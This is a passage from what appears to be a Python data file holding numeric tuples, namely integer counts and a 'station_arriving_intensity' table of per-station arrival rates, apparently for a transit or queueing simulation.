0, 10, 12, 6, 8, 4, 5, 4, 4, 5, 1, 0, 0, 0), (12, 22, 17, 7, 16, 7, 4, 3, 7, 2, 3, 1, 0, 13, 16, 14, 3, 12, 6, 5, 6, 4, 8, 3, 4, 0), (16, 11, 13, 15, 12, 3, 6, 5, 6, 4, 2, 0, 0, 13, 9, 5, 8, 12, 4, 5, 5, 7, 6, 2, 0, 0), (13, 13, 17, 15, 10, 4, 7, 3, 4, 0, 3, 0, 0, 15, 11, 7, 9, 9, 4, 5, 4, 7, 8, 2, 1, 0), (16, 17, 12, 20, 22, 6, 11, 4, 6, 5, 3, 0, 0, 19, 9, 8, 11, 16, 4, 8, 7, 5, 4, 3, 0, 0), (17, 6, 14, 11, 10, 10, 6, 6, 6, 1, 3, 2, 0, 21, 10, 13, 11, 11, 6, 6, 1, 7, 4, 2, 4, 0), (12, 10, 13, 21, 13, 6, 8, 8, 12, 2, 2, 0, 0, 15, 12, 5, 4, 14, 6, 5, 2, 8, 6, 2, 3, 0), (19, 12, 17, 16, 13, 7, 7, 10, 7, 4, 0, 1, 0, 12, 15, 8, 5, 16, 5, 2, 2, 8, 1, 0, 1, 0), (18, 10, 15, 12, 8, 3, 6, 2, 4, 2, 2, 1, 0, 20, 8, 12, 7, 10, 4, 6, 6, 9, 2, 2, 3, 0), (8, 8, 13, 16, 14, 4, 7, 3, 2, 2, 4, 0, 0, 13, 10, 11, 7, 19, 4, 10, 6, 6, 1, 4, 1, 0), (15, 13, 12, 11, 11, 3, 2, 4, 5, 7, 2, 1, 0, 12, 16, 3, 9, 15, 7, 4, 8, 11, 4, 6, 1, 0), (16, 15, 18, 16, 9, 2, 7, 4, 10, 7, 1, 0, 0, 16, 16, 12, 6, 18, 5, 3, 3, 6, 4, 4, 0, 0), (15, 16, 4, 19, 10, 5, 4, 4, 5, 4, 3, 3, 0, 21, 11, 12, 7, 8, 2, 5, 2, 2, 7, 2, 2, 0), (21, 11, 14, 15, 15, 8, 6, 5, 3, 3, 2, 2, 0, 19, 10, 6, 7, 8, 6, 1, 6, 3, 2, 6, 1, 0), (11, 16, 8, 14, 9, 5, 3, 4, 3, 2, 0, 1, 0, 17, 9, 13, 7, 12, 7, 5, 9, 8, 7, 3, 0, 0), (13, 20, 13, 13, 16, 3, 3, 5, 11, 4, 0, 4, 0, 25, 12, 10, 15, 16, 6, 4, 6, 4, 5, 2, 1, 0), (14, 8, 13, 12, 13, 4, 3, 2, 4, 2, 2, 1, 0, 12, 16, 12, 9, 19, 7, 7, 6, 7, 4, 1, 0, 0), (16, 18, 12, 20, 12, 5, 5, 1, 8, 1, 1, 1, 0, 19, 19, 9, 6, 11, 12, 4, 2, 8, 4, 2, 2, 0), (25, 19, 13, 16, 10, 4, 7, 2, 2, 1, 1, 0, 0, 26, 14, 10, 10, 14, 9, 3, 6, 8, 4, 1, 3, 0), (17, 12, 8, 16, 11, 6, 5, 6, 6, 4, 2, 0, 0, 13, 20, 12, 9, 11, 11, 10, 2, 8, 5, 1, 3, 0), (10, 10, 10, 15, 8, 10, 12, 4, 8, 3, 5, 0, 0, 18, 13, 14, 6, 12, 4, 13, 3, 6, 1, 4, 3, 0), (12, 9, 14, 11, 16, 8, 5, 3, 8, 0, 2, 1, 0, 9, 9, 13, 8, 12, 6, 3, 5, 5, 7, 0, 0, 0), (18, 11, 10, 13, 10, 3, 5, 4, 5, 1, 3, 1, 0, 24, 11, 13, 7, 10, 3, 5, 2, 5, 5, 3, 1, 0), (17, 16, 11, 17, 16, 8, 6, 2, 3, 4, 0, 2, 0, 21, 13, 16, 9, 14, 4, 4, 5, 4, 5, 2, 0, 0), (14, 14, 6, 16, 7, 8, 11, 9, 8, 2, 4, 0, 0, 17, 13, 10, 6, 13, 8, 5, 4, 5, 5, 3, 0, 0), (22, 8, 8, 12, 9, 3, 0, 0, 3, 2, 1, 2, 0, 15, 12, 3, 11, 9, 3, 7, 7, 8, 12, 3, 1, 0), (18, 7, 14, 9, 7, 6, 7, 2, 7, 4, 3, 2, 0, 17, 20, 8, 6, 11, 5, 1, 4, 12, 6, 4, 1, 0), (18, 10, 9, 12, 10, 8, 9, 4, 4, 3, 5, 2, 0, 24, 15, 5, 10, 12, 11, 5, 5, 8, 6, 2, 1, 0), (15, 10, 11, 16, 11, 3, 5, 4, 3, 2, 3, 3, 0, 13, 11, 12, 8, 12, 5, 4, 0, 10, 2, 3, 1, 0), (22, 9, 10, 9, 12, 6, 7, 6, 6, 3, 1, 0, 0, 15, 20, 13, 9, 10, 7, 6, 4, 8, 8, 3, 1, 0), (15, 17, 9, 13, 8, 6, 6, 0, 4, 0, 2, 2, 0, 18, 15, 5, 11, 14, 6, 7, 6, 4, 5, 1, 2, 0), (16, 14, 12, 11, 10, 4, 6, 3, 5, 3, 2, 0, 0, 13, 12, 8, 8, 12, 5, 4, 2, 5, 6, 7, 3, 0), (14, 7, 13, 16, 11, 5, 3, 0, 7, 3, 2, 2, 0, 19, 8, 9, 6, 15, 8, 7, 5, 6, 3, 0, 2, 0), (18, 13, 13, 21, 16, 11, 3, 5, 6, 3, 0, 2, 0, 15, 13, 10, 9, 15, 6, 5, 2, 5, 10, 2, 2, 0), (15, 13, 12, 16, 10, 3, 6, 2, 6, 2, 0, 0, 0, 13, 10, 15, 10, 14, 12, 4, 3, 3, 3, 2, 1, 0), (15, 6, 21, 12, 19, 6, 7, 4, 6, 1, 2, 3, 0, 11, 6, 11, 7, 14, 2, 8, 3, 4, 8, 3, 2, 0), (18, 13, 12, 15, 13, 6, 2, 9, 8, 2, 5, 1, 0, 15, 20, 10, 7, 9, 5, 5, 3, 5, 3, 2, 1, 0), (13, 14, 9, 14, 5, 12, 5, 3, 5, 3, 2, 0, 0, 14, 11, 8, 2, 13, 8, 7, 0, 4, 5, 0, 2, 0), (15, 13, 15, 15, 16, 4, 3, 5, 5, 4, 0, 1, 0, 15, 14, 15, 3, 13, 5, 4, 4, 6, 2, 3, 1, 0), (11, 12, 17, 9, 9, 4, 8, 9, 9, 3, 4, 1, 0, 19, 15, 8, 7, 8, 5, 4, 4, 1, 6, 2, 1, 0), (13, 14, 17, 10, 12, 2, 5, 8, 5, 1, 0, 2, 0, 13, 16, 7, 9, 6, 5, 6, 5, 9, 5, 1, 0, 0), (15, 13, 11, 8, 15, 3, 4, 6, 6, 2, 1, 0, 0, 17, 11, 2, 4, 8, 6, 4, 3, 4, 2, 0, 1, 0), (13, 11, 11, 15, 18, 2, 8, 2, 2, 2, 3, 1, 0, 13, 14, 10, 9, 8, 6, 2, 8, 11, 8, 0, 2, 0), (18, 10, 14, 10, 11, 6, 6, 3, 6, 2, 1, 1, 0, 16, 17, 9, 7, 13, 3, 5, 6, 5, 4, 2, 1, 0), (11, 8, 12, 9, 4, 2, 3, 9, 1, 3, 5, 3, 0, 15, 9, 7, 7, 10, 6, 9, 8, 6, 2, 1, 0, 0), (14, 9, 14, 18, 9, 3, 2, 4, 6, 5, 1, 2, 0, 16, 17, 10, 9, 11, 5, 4, 2, 10, 2, 4, 2, 0), (8, 5, 15, 12, 12, 7, 6, 5, 5, 7, 2, 0, 0, 15, 12, 8, 10, 15, 4, 2, 2, 7, 5, 3, 2, 0), (12, 7, 12, 16, 9, 8, 3, 5, 3, 5, 2, 1, 0, 11, 12, 18, 7, 13, 6, 7, 4, 5, 3, 1, 1, 0), (15, 9, 10, 14, 13, 5, 10, 6, 4, 1, 2, 2, 0, 9, 10, 11, 5, 14, 4, 3, 6, 4, 3, 5, 1, 0), (12, 7, 15, 10, 10, 7, 6, 6, 4, 3, 3, 1, 0, 10, 15, 10, 11, 13, 5, 4, 5, 8, 6, 8, 0, 0), (16, 8, 8, 18, 10, 5, 1, 5, 8, 2, 3, 0, 0, 11, 16, 9, 8, 12, 6, 3, 2, 3, 6, 1, 0, 0), (13, 19, 10, 10, 9, 5, 5, 4, 7, 4, 1, 1, 0, 11, 13, 9, 6, 14, 4, 3, 2, 5, 4, 0, 1, 0), (15, 11, 9, 15, 12, 6, 3, 4, 6, 4, 3, 1, 0, 14, 7, 7, 5, 11, 10, 5, 4, 4, 3, 0, 1, 0), (14, 9, 13, 11, 4, 5, 3, 6, 9, 2, 6, 0, 0, 21, 12, 5, 7, 15, 7, 6, 6, 5, 3, 5, 1, 0), (12, 12, 11, 15, 10, 8, 3, 4, 3, 2, 1, 2, 0, 17, 9, 14, 7, 10, 5, 4, 1, 8, 2, 2, 1, 0), (14, 11, 8, 12, 15, 4, 3, 8, 3, 2, 2, 0, 0, 16, 10, 16, 13, 7, 2, 2, 1, 6, 5, 1, 0, 0), (15, 11, 7, 11, 10, 4, 7, 3, 3, 2, 2, 1, 0, 14, 10, 9, 3, 10, 4, 8, 8, 5, 3, 4, 0, 0), (17, 10, 13, 12, 8, 6, 3, 2, 10, 5, 1, 0, 0, 8, 9, 8, 6, 16, 5, 3, 3, 5, 4, 2, 0, 0), (17, 8, 15, 16, 13, 5, 3, 4, 5, 0, 1, 1, 0, 18, 12, 13, 8, 9, 3, 3, 5, 5, 7, 3, 0, 0), (18, 11, 21, 8, 8, 4, 8, 3, 10, 5, 0, 1, 0, 11, 11, 4, 4, 10, 9, 4, 3, 3, 2, 1, 2, 0), (16, 13, 9, 17, 12, 4, 3, 3, 5, 2, 1, 0, 0, 19, 9, 9, 8, 7, 4, 2, 1, 8, 6, 2, 1, 0), (12, 10, 10, 11, 11, 4, 4, 4, 8, 1, 0, 0, 0, 18, 10, 5, 6, 12, 7, 6, 4, 9, 6, 2, 2, 0), (12, 7, 14, 11, 10, 4, 4, 4, 2, 1, 1, 1, 0, 8, 10, 7, 7, 13, 5, 2, 4, 5, 3, 4, 2, 0), (15, 11, 7, 16, 6, 2, 3, 3, 7, 0, 4, 2, 0, 20, 10, 9, 9, 12, 12, 9, 3, 1, 3, 2, 1, 0), (15, 11, 16, 19, 9, 6, 3, 2, 4, 2, 1, 0, 0, 16, 18, 11, 4, 13, 8, 1, 6, 6, 6, 1, 0, 0), (18, 8, 8, 13, 9, 8, 11, 3, 3, 2, 2, 2, 0, 13, 12, 14, 5, 12, 4, 2, 7, 7, 2, 0, 1, 0), (10, 19, 14, 10, 11, 3, 0, 5, 4, 2, 2, 0, 0, 14, 7, 8, 5, 16, 3, 7, 4, 5, 5, 1, 2, 0), (13, 15, 12, 6, 10, 7, 4, 3, 5, 0, 3, 0, 0, 15, 14, 9, 4, 10, 11, 9, 6, 5, 6, 1, 1, 0), (18, 9, 13, 6, 8, 3, 4, 4, 6, 0, 2, 2, 0, 18, 7, 6, 6, 8, 5, 3, 3, 7, 4, 3, 1, 0), (11, 12, 19, 10, 10, 6, 3, 7, 3, 1, 4, 0, 0, 15, 12, 8, 3, 10, 5, 3, 3, 10, 2, 1, 0, 0), (20, 10, 15, 11, 14, 2, 3, 6, 7, 1, 4, 2, 0, 10, 11, 8, 10, 11, 2, 9, 5, 5, 10, 2, 2, 0), (17, 11, 6, 10, 7, 7, 2, 6, 11, 2, 1, 0, 0, 13, 8, 11, 5, 12, 2, 5, 1, 2, 2, 1, 3, 0), (16, 12, 13, 12, 7, 5, 2, 6, 8, 1, 0, 2, 0, 13, 12, 7, 10, 9, 3, 5, 3, 5, 3, 3, 1, 0), (13, 10, 10, 6, 13, 4, 3, 4, 2, 5, 1, 1, 0, 13, 11, 1, 6, 15, 11, 2, 2, 7, 2, 3, 2, 0), (13, 6, 13, 22, 9, 4, 5, 2, 6, 2, 1, 1, 0, 12, 7, 9, 11, 7, 2, 6, 3, 4, 9, 2, 0, 0), (10, 7, 9, 9, 12, 4, 5, 6, 5, 3, 2, 0, 0, 14, 11, 11, 10, 8, 4, 6, 4, 5, 1, 1, 2, 0), (15, 8, 12, 19, 11, 4, 2, 5, 6, 6, 2, 1, 0, 12, 12, 10, 6, 8, 7, 3, 6, 11, 4, 2, 0, 0), (16, 10, 12, 10, 7, 5, 3, 4, 1, 0, 1, 2, 0, 19, 8, 9, 8, 10, 5, 3, 3, 11, 3, 3, 1, 0), (11, 13, 17, 8, 8, 6, 4, 4, 10, 5, 0, 2, 0, 13, 11, 9, 5, 8, 6, 2, 3, 14, 6, 1, 3, 0), (14, 13, 10, 12, 6, 7, 2, 4, 3, 3, 0, 2, 0, 13, 10, 12, 5, 7, 3, 2, 3, 5, 1, 0, 1, 0), (10, 6, 11, 9, 10, 8, 2, 4, 3, 0, 2, 1, 0, 15, 12, 7, 9, 12, 3, 1, 1, 5, 4, 5, 0, 0), (14, 9, 8, 16, 13, 3, 2, 3, 6, 2, 2, 1, 0, 21, 15, 7, 7, 16, 2, 6, 5, 2, 2, 0, 1, 0), (11, 12, 11, 12, 7, 2, 8, 6, 0, 3, 0, 1, 0, 11, 8, 5, 11, 13, 4, 3, 5, 5, 4, 2, 1, 0), (10, 12, 11, 15, 18, 2, 5, 2, 8, 2, 1, 2, 0, 17, 13, 4, 4, 13, 6, 4, 1, 3, 8, 1, 1, 0), (11, 12, 10, 8, 4, 6, 2, 9, 4, 4, 0, 0, 0, 15, 10, 8, 2, 7, 6, 3, 0, 1, 2, 3, 2, 0), (15, 9, 12, 12, 8, 8, 4, 5, 9, 1, 1, 2, 0, 16, 9, 6, 4, 12, 7, 3, 5, 7, 5, 3, 0, 0), (9, 14, 10, 13, 10, 7, 2, 6, 7, 1, 1, 1, 0, 12, 10, 3, 9, 11, 4, 5, 2, 3, 5, 3, 0, 0), (14, 10, 12, 12, 8, 7, 0, 3, 3, 4, 2, 1, 0, 20, 16, 8, 5, 4, 1, 4, 6, 9, 5, 2, 0, 0), (21, 6, 11, 20, 12, 2, 5, 2, 5, 1, 0, 1, 0, 14, 7, 7, 7, 9, 8, 6, 3, 4, 6, 2, 0, 0), (6, 9, 13, 11, 6, 4, 5, 3, 4, 4, 1, 1, 0, 12, 12, 9, 2, 13, 5, 5, 3, 1, 5, 1, 1, 0), (5, 8, 14, 3, 5, 4, 1, 2, 5, 0, 2, 1, 0, 17, 8, 8, 6, 6, 5, 6, 2, 5, 3, 3, 2, 0), (8, 13, 11, 12, 8, 4, 3, 8, 4, 0, 1, 1, 0, 10, 10, 6, 1, 9, 4, 1, 1, 6, 3, 1, 0, 0), (9, 6, 18, 12, 10, 6, 6, 2, 3, 1, 1, 1, 0, 11, 9, 12, 3, 13, 7, 4, 4, 5, 5, 2, 1, 0), (11, 8, 6, 7, 10, 1, 3, 7, 6, 3, 0, 1, 0, 8, 15, 6, 9, 16, 5, 1, 2, 5, 3, 1, 0, 0), (13, 6, 6, 7, 11, 9, 2, 2, 4, 0, 1, 0, 0, 13, 9, 8, 4, 11, 1, 2, 1, 3, 3, 3, 2, 0), (8, 5, 16, 13, 8, 8, 3, 0, 4, 0, 0, 2, 0, 12, 12, 8, 7, 10, 8, 6, 3, 8, 2, 2, 0, 0), (14, 6, 6, 7, 8, 4, 2, 1, 4, 2, 0, 2, 0, 10, 7, 7, 4, 7, 7, 3, 4, 3, 5, 1, 0, 0), (4, 13, 13, 10, 14, 4, 5, 2, 5, 5, 2, 0, 0, 15, 3, 12, 2, 16, 5, 3, 3, 1, 3, 1, 1, 0), (9, 8, 14, 12, 3, 2, 1, 4, 5, 3, 0, 2, 0, 10, 10, 9, 5, 12, 0, 4, 5, 8, 4, 0, 0, 0), (18, 6, 10, 8, 8, 6, 1, 4, 7, 3, 0, 2, 0, 11, 11, 9, 5, 6, 7, 1, 1, 5, 2, 1, 0, 0), (9, 10, 14, 3, 5, 5, 3, 4, 4, 1, 1, 2, 0, 8, 4, 8, 3, 6, 5, 2, 2, 4, 4, 3, 1, 0), (8, 11, 10, 6, 8, 0, 4, 4, 6, 3, 0, 2, 0, 13, 5, 7, 3, 1, 7, 3, 3, 8, 2, 1, 2, 0), (10, 3, 13, 8, 5, 5, 5, 4, 4, 1, 4, 1, 0, 13, 10, 4, 2, 9, 3, 0, 2, 7, 3, 5, 1, 0), (15, 3, 7, 7, 6, 4, 1, 2, 2, 1, 1, 1, 0, 9, 8, 5, 7, 7, 0, 1, 2, 4, 2, 2, 2, 0), (10, 2, 10, 9, 7, 5, 2, 5, 4, 0, 0, 0, 0, 10, 7, 5, 2, 10, 1, 3, 5, 5, 3, 0, 0, 0), (7, 3, 6, 7, 6, 2, 3, 6, 5, 2, 1, 0, 0, 8, 4, 7, 9, 7, 2, 3, 3, 4, 5, 1, 0, 0), (3, 5, 10, 7, 4, 3, 4, 3, 1, 1, 0, 0, 0, 10, 6, 7, 4, 7, 4, 0, 1, 1, 4, 1, 0, 0), (9, 4, 7, 5, 7, 1, 3, 3, 3, 3, 0, 0, 0, 5, 11, 5, 3, 4, 2, 2, 4, 3, 3, 1, 0, 0), (6, 3, 4, 12, 4, 4, 2, 2, 1, 0, 1, 0, 0, 7, 7, 5, 1, 14, 1, 4, 2, 2, 2, 1, 0, 0), (6, 2, 8, 3, 5, 2, 2, 2, 4, 0, 2, 0, 0, 8, 5, 1, 3, 6, 3, 3, 3, 2, 2, 3, 1, 0), (0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0))
station_arriving_intensity = ((8.033384925394829, 8.840461695509067, 8.33805316738001, 9.943468438181492, 8.887496972175379, 5.021847891259743, 6.6336569845982645, 7.445081876767077, 9.744158499468812, 6.332824024835792, 6.728424262216965, 7.836664125289878, 8.134208340125381), (8.566923443231959, 9.424097110631614, 8.888554546128244, 10.600230805242587, 9.475984539958779, 5.353573734468089, 7.07115030602191, 7.9352219566491335, 10.387592522132655, 6.75036910764344, 7.172953817529811, 8.353946657302968, 8.671666635903767), (9.09875681436757, 10.005416273425567, 9.436867656875862, 11.254380327463672, 10.062340757999591, 5.683976183219912, 7.506909612737127, 8.423400396647072, 11.028458891004078, 7.166262040032874, 7.615717038042101, 8.869172243284888, 9.206983725135505), (9.6268124690345, 10.582112803098315, 9.980817390911767, 11.903322252051318, 10.644258681603043, 6.011744996136181, 7.939205826636729, 8.907681851991212, 11.664216257473749, 7.578852317481889, 8.054957458923813, 9.380297095888738, 9.738036490006762), (10.149017837465571, 11.15188031885724, 10.518228639524859, 12.544461826212112, 11.219431366074389, 6.335569931837869, 8.366309869613534, 9.386130977911865, 12.292323272932332, 7.986489435468286, 8.48891861534492, 9.885277427767623, 10.262701812703709), (10.663300349893618, 11.712412439909741, 11.04692629400403, 13.17520429715263, 11.785551866718848, 6.654140748945943, 8.786492663560358, 9.856812429639348, 12.910238588770495, 8.387522889469862, 8.915844042475412, 10.382069451574637, 10.778856575412524), (11.167587436551466, 12.261402785463202, 11.564735245638186, 13.792954912079445, 12.34031323884167, 6.9661472060813825, 9.19802513037002, 10.317790862403982, 13.515420856378904, 8.780302174964413, 9.333977275485251, 10.868629379962893, 11.284377660319372), (11.65980652767195, 12.79654497472501, 12.069480385716217, 14.39511891819914, 12.881408537748086, 7.270279061865153, 9.599178191935335, 10.767130931436084, 14.105328727148231, 9.16317678742974, 9.74156184954443, 11.342913425585486, 11.777141949610431), (12.137885053487896, 13.31553262690256, 12.558986605527034, 14.979101562718284, 13.406530818743338, 7.565226074918224, 9.988222770149116, 11.20289729196596, 14.67742085246913, 9.53449622234364, 10.136841299822914, 11.802877801095525, 12.255026325471867), (12.599750444232136, 13.816059361203237, 13.031078796359527, 15.54230809284347, 13.913373137132655, 7.849678003861574, 10.363429786904192, 11.623154599223941, 15.229155883732279, 9.892609975183907, 10.518059161490685, 12.246478719146102, 12.71590767008986), (13.043330130137491, 14.295818796834425, 13.483581849502599, 16.08214375578126, 14.399628548221282, 8.122324607316171, 10.723070164093368, 12.025967508440338, 15.757992472328343, 10.235867541428343, 10.883458969717719, 12.671672392390324, 13.157662865650577), (13.466551541436809, 14.752504553003531, 13.914320656245145, 16.596013798738237, 14.862990107314454, 8.38185564390299, 11.065414823609466, 12.409400674845465, 16.26138926964799, 10.56261841655475, 11.231284259673998, 13.076415033481297, 13.57816879434018), (13.8673421083629, 15.183810248917917, 14.321120107876064, 17.08132346892098, 15.301150869717404, 8.626960872242991, 11.388734687345298, 12.771518753669634, 16.736804927081888, 10.871212096040916, 11.559778566529495, 13.45866285507211, 13.975302338344855), (14.243629261148602, 15.587429503784993, 14.701805095684259, 17.53547801353607, 15.711803890735363, 8.856330050957158, 11.69130067719369, 13.11038640014317, 17.181698096020693, 11.159998075364648, 11.86718542545419, 13.816372069815873, 14.346940379850777), (14.593340430026746, 15.961055936812143, 15.054200510958635, 17.95588267979007, 16.092642225673583, 9.068652938666455, 11.971383715047459, 13.424068269496395, 17.593527427855076, 11.427325850003735, 12.151748371618055, 14.147498890365696, 14.690959801044102), (14.914403045230168, 16.30238316720675, 15.376131244988068, 18.339942714889578, 16.441358929837293, 9.26261929399186, 12.227254722799401, 13.71062901695961, 17.96975157397571, 11.671544915435986, 12.411710940191071, 14.449999529374674, 15.00523748411101), (15.204744536991681, 16.609104814176213, 15.66542218906148, 18.685063366041145, 16.755647058531732, 9.436918875554335, 12.457184622342362, 13.968133297763139, 18.307829185773258, 11.891004767139194, 12.64531666634322, 14.721830199495905, 15.287650311237673), (15.46229233554412, 16.878914496927916, 15.919898234467764, 18.98864988045138, 17.033199667062142, 9.590241441974857, 12.659444335569138, 14.19464576713731, 18.605218914638375, 12.084054900591148, 12.850809085244478, 14.960947113382488, 15.536075164610265), (15.684973871120327, 17.10950583466924, 16.137384272495808, 19.248107505326846, 17.271709810733743, 9.721276751874406, 12.832304784372562, 14.388231080312417, 18.859379411961754, 12.249044811269659, 13.026431732064815, 15.165306483687544, 15.748388926414954), (15.870716573953118, 17.29857244660759, 16.315705194434525, 19.460841487874106, 17.468870544851786, 9.828714563873934, 12.974036890645431, 14.546953892518793, 19.067769329134048, 12.384323994652526, 13.170428141974206, 15.332864523064154, 15.922468478837914), (16.01744787427533, 17.44380795195034, 16.452685891572806, 19.624257075299766, 17.62237492472151, 9.91124463659443, 13.08291157628058, 14.668878858986748, 19.22784731754592, 12.488241946217535, 13.28104185014264, 15.461577444165426, 16.05619070406532), (16.123095202319785, 17.542905969904893, 16.54615125519955, 19.73575951481038, 17.729916005648143, 9.967556728656858, 13.157199763170816, 14.752070634946598, 19.337072028588036, 12.559148161442488, 13.356516391740096, 15.54940145964447, 16.147432484283325), (16.18558598831933, 17.59356011967863, 16.593926176603656, 19.79275405361254, 17.78918684293692, 9.996340598682188, 13.19517237320896, 14.794593875628664, 19.392902113651065, 12.595392135805188, 13.395095301936545, 15.594292782154383, 16.194070701678125), (16.208629381348224, 17.599557750342935, 16.599877091906723, 19.799889300411525, 17.804371289652156, 10.0, 13.199686403614942, 14.79919012345679, 19.399881975308645, 12.599667636031093, 13.399932859458785, 15.599836122542294, 16.2), (16.225619860854646, 17.59605925925926, 16.598903703703705, 19.799011111111113, 17.812972181783763, 10.0, 13.197206100217867, 14.7928, 19.398946666666667, 12.59704098765432, 13.39939932659933, 15.598538271604937, 16.2), (16.242251568338528, 17.589163237311386, 16.59698216735254, 19.797273662551444, 17.821383912951205, 10.0, 13.192318244170096, 14.78024691358025, 19.3970987654321, 12.591870141746686, 13.39834143908218, 15.595976223136716, 16.2), (16.258523230476854, 17.578975034293556, 16.594138820301787, 19.79469670781893, 17.82960618947377, 10.0, 13.185098749293955, 14.76176790123457, 19.39436197530864, 12.58424113397348, 13.396768774161368, 15.592185093735715, 16.2), (16.27443357394662, 17.5656, 16.5904, 19.7913, 17.837638717670742, 10.0, 13.175623529411766, 14.7376, 19.39076, 12.57424, 13.39469090909091, 15.587200000000003, 16.2), (16.2899813254248, 17.549143484224967, 16.585792043895747, 19.787103292181072, 17.845481203861443, 10.0, 13.163968498345842, 14.707980246913582, 19.386316543209876, 12.561952775491541, 13.39211742112483, 15.581056058527665, 16.2), (16.3051652115884, 17.52971083676269, 16.580341289437587, 19.78212633744856, 17.853133354365152, 10.0, 13.150209569918506, 14.673145679012345, 19.381055308641976, 12.547465496113398, 13.389057887517147, 15.57378838591678, 16.2), (16.319983959114396, 17.50740740740741, 16.574074074074073, 19.77638888888889, 17.860594875501178, 10.0, 13.13442265795207, 14.633333333333333, 19.375, 12.530864197530866, 13.385521885521886, 15.56543209876543, 16.2), (16.334436294679772, 17.482338545953365, 16.567016735253773, 19.76991069958848, 17.867865473588814, 10.0, 13.116683676268863, 14.588780246913581, 19.368174320987656, 12.512234915409238, 13.381518992393067, 15.556022313671699, 16.2), (16.34852094496153, 17.45460960219479, 16.55919561042524, 19.762711522633747, 17.874944854947355, 10.0, 13.097068538691198, 14.539723456790126, 19.360601975308644, 12.49166368541381, 13.377058785384712, 15.545594147233656, 16.2), (16.362236636636634, 17.424325925925924, 16.55063703703704, 19.75481111111111, 17.8818327258961, 10.0, 13.075653159041394, 14.486400000000001, 19.352306666666667, 12.469236543209878, 13.372150841750841, 15.534182716049381, 16.2), (16.375582096382097, 17.391592866941014, 16.541367352537723, 19.746229218106997, 17.888528792754347, 10.0, 13.052513451141776, 14.429046913580246, 19.343312098765438, 12.445039524462736, 13.36680473874548, 15.521823136716964, 16.2), (16.388556050874893, 17.356515775034293, 16.53141289437586, 19.736985596707818, 17.895032761841392, 10.0, 13.027725328814654, 14.367901234567903, 19.333641975308645, 12.419158664837678, 13.361030053622645, 15.508550525834478, 16.2), (16.40115722679201, 17.3192, 16.5208, 19.7271, 17.901344339476537, 10.0, 13.001364705882352, 14.303200000000002, 19.32332, 12.391680000000001, 13.354836363636364, 15.494400000000002, 16.2), (16.41338435081044, 17.27975089163237, 16.50955500685871, 19.71659218106996, 17.907463231979076, 10.0, 12.97350749616719, 14.23518024691358, 19.31236987654321, 12.362689565615, 13.348233246040657, 15.479406675811616, 16.2), (16.425236149607162, 17.238273799725654, 16.49770425240055, 19.70548189300412, 17.913389145668305, 10.0, 12.944229613491487, 14.164079012345681, 19.300815308641976, 12.332273397347967, 13.341230278089538, 15.4636056698674, 16.2), (16.436711349859177, 17.194874074074075, 16.485274074074077, 19.69378888888889, 17.919121786863524, 10.0, 12.913606971677561, 14.090133333333334, 19.288680000000003, 12.300517530864198, 13.333837037037037, 15.447032098765431, 16.2), (16.44780867824346, 17.149657064471878, 16.472290809327845, 19.6815329218107, 17.924660861884032, 10.0, 12.88171548454773, 14.013580246913584, 19.27598765432099, 12.267508001828991, 13.326063100137175, 15.429721079103798, 16.2), (16.458526861437004, 17.102728120713305, 16.458780795610426, 19.66873374485597, 17.930006077049125, 10.0, 12.848631065924312, 13.934656790123459, 19.262761975308642, 12.233330845907636, 13.317918044643973, 15.411707727480568, 16.2), (16.4688646261168, 17.054192592592596, 16.444770370370374, 19.655411111111114, 17.935157138678093, 10.0, 12.814429629629629, 13.8536, 19.24902666666667, 12.198072098765433, 13.30941144781145, 15.393027160493828, 16.2), (16.47882069895983, 17.00415582990398, 16.430285871056242, 19.641584773662554, 17.940113753090245, 10.0, 12.779187089486001, 13.770646913580249, 19.234805432098767, 12.161817796067673, 13.300552886893627, 15.373714494741657, 16.2), (16.488393806643085, 16.9527231824417, 16.4153536351166, 19.62727448559671, 17.944875626604873, 10.0, 12.742979359315743, 13.686034567901238, 19.220121975308643, 12.124653973479653, 13.291351939144532, 15.353804846822133, 16.2), (16.497582675843546, 16.900000000000002, 16.400000000000002, 19.6125, 17.949442465541274, 10.0, 12.705882352941178, 13.600000000000001, 19.205, 12.086666666666668, 13.281818181818181, 15.333333333333332, 16.2), (16.50638603323821, 16.846091632373113, 16.384251303155008, 19.59728106995885, 17.953813976218747, 10.0, 12.667971984184621, 13.512780246913582, 19.189463209876543, 12.04794191129401, 13.271961192168598, 15.312335070873344, 16.2), (16.514802605504055, 16.79110342935528, 16.36813388203018, 19.581637448559672, 17.957989864956588, 10.0, 12.629324166868395, 13.424612345679012, 19.173535308641977, 12.008565743026978, 13.261790547449806, 15.29084517604024, 16.2), (16.522831119318074, 16.735140740740743, 16.351674074074076, 19.565588888888893, 17.961969838074097, 10.0, 12.590014814814815, 13.335733333333335, 19.15724, 11.968624197530865, 13.251315824915824, 15.268898765432098, 16.2), (16.53047030135726, 16.67830891632373, 16.334898216735255, 19.549155144032923, 17.965753601890572, 10.0, 12.550119841846204, 13.246380246913581, 19.14060098765432, 11.928203310470966, 13.240546601820677, 15.246530955647007, 16.2), (16.537718878298588, 16.620713305898494, 16.31783264746228, 19.53235596707819, 17.969340862725304, 10.0, 12.50971516178488, 13.15679012345679, 19.12364197530864, 11.887389117512575, 13.22949245541838, 15.223776863283039, 16.2), (16.544575576819057, 16.56245925925926, 16.300503703703704, 19.515211111111114, 17.9727313268976, 10.0, 12.46887668845316, 13.0672, 19.10638666666667, 11.846267654320988, 13.218162962962964, 15.200671604938274, 16.2), (16.551039123595647, 16.503652126200276, 16.282937722908095, 19.497740329218107, 17.975924700726743, 10.0, 12.427680335673365, 12.977846913580246, 19.0888587654321, 11.8049249565615, 13.206567701708444, 15.177250297210794, 16.2), (16.55710824530535, 16.444397256515778, 16.26516104252401, 19.479963374485596, 17.978920690532046, 10.0, 12.386202017267813, 12.888967901234569, 19.071081975308644, 11.763447059899406, 13.194716248908842, 15.153548056698675, 16.2), (16.562781668625146, 16.384800000000002, 16.2472, 19.4619, 17.981719002632804, 10.0, 12.344517647058824, 12.800799999999999, 19.05308, 11.72192, 13.18261818181818, 15.1296, 16.2), (16.568058120232035, 16.324965706447188, 16.229080932784637, 19.443569958847736, 17.984319343348304, 10.0, 12.302703138868717, 12.71358024691358, 19.034876543209876, 11.68042981252858, 13.170283077690485, 15.10544124371285, 16.2), (16.572936326802996, 16.264999725651577, 16.210830178326475, 19.424993004115226, 17.986721418997856, 10.0, 12.26083440651981, 12.627545679012346, 19.016495308641975, 11.639062533150437, 13.157720513779774, 15.0811069044353, 16.2), (16.577415015015013, 16.205007407407408, 16.192474074074077, 